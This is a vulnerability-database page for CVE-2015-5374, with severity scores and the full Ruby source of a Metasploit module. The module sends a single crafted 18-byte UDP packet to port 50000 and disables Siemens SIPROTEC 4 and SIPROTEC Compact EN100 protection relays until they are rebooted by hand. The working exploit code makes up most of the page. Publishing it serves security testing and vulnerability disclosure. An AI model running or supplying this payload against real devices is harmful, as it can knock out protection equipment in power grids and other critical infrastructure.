Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module Denial Of Service

2024-08-3100:00:00

M. Can Kurnaz, metasploit.com

packetstormsecurity.com

siemens siprotec

siprotec compact

en100 ethernet module

denial of service

specially crafted packet

port 50000/udp

manual reboot

cve-2015-5374

cvss v2

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

AI Score

Confidence

Low

EPSS

0.337

Percentile

97.1%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::Udp  
include Msf::Auxiliary::Dos  
def initialize(info = {})  
super(  
'Name' => 'Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module - Denial of Service',  
'Description' => %q{  
This module sends a specially crafted packet to port 50000/UDP  
causing a denial of service of the affected (Siemens SIPROTEC 4 and SIPROTEC Compact < V4.25) devices.  
A manual reboot is required to return the device to service.  
CVE-2015-5374 and a CVSS v2 base score of 7.8 have been assigned to this vulnerability.  
},  
'Author' => [ 'M. Can Kurnaz' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 1 $',  
'References' =>  
[  
[ 'CVE' '2015-5374' ],  
[ 'EDB', '44103' ],  
[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-15-202-01' ]  
])  
register_options([Opt::RPORT(50000),])  
end  
def run  
connect_udp  
pckt = "\x11\x49\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x9e"  
print_status('Sending DoS packet...')  
udp_sock.put(pckt)  
disconnect_udp  
end  
end  
  
`